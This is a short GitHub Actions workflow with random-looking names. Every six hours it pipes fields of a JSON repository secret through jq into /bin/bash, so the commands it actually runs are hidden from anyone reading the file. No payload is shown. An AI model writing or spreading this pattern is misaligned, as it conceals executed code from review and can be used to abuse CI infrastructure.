name: liutang19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '14 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liutang19871010
        env:
          hli691: ${{ secrets.hli691 }}
        run: |
          echo $hli691 | jq -r .r60 | /bin/bash
          echo $xkws493 | jq -r .y2 | /bin/bash
          echo $bqp036 | jq -r .l92 | /bin/bash
          echo $fz91339 | jq -r .lncff985 | /bin/bash
          echo $bwl61838 | jq -r .b27 | /bin/bash

